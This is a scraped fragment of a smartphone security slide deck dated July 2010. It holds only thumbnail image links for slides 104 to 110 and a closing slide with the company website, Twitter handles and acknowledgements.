![Page 104: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/104.jpg)
Friday, July 9, 2010
![Page 105: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/105.jpg)
Friday, July 9, 2010
![Page 106: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/106.jpg)
Friday, July 9, 2010
![Page 107: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/107.jpg)
Friday, July 9, 2010
![Page 108: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/108.jpg)
Friday, July 9, 2010
![Page 109: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/109.jpg)
Friday, July 9, 2010
![Page 110: The New World of Smartphone Security](https://reader034.vdocuments.us/reader034/viewer/2022051412/54b7315b4a7959772f8b4745/html5/thumbnails/110.jpg)
Comments/Feedback:
www.stratumsecurity.com
Twitter:
@packetwerks
@stratumsecurity
Special Thanks: Tiago Stock
Friday, July 9, 2010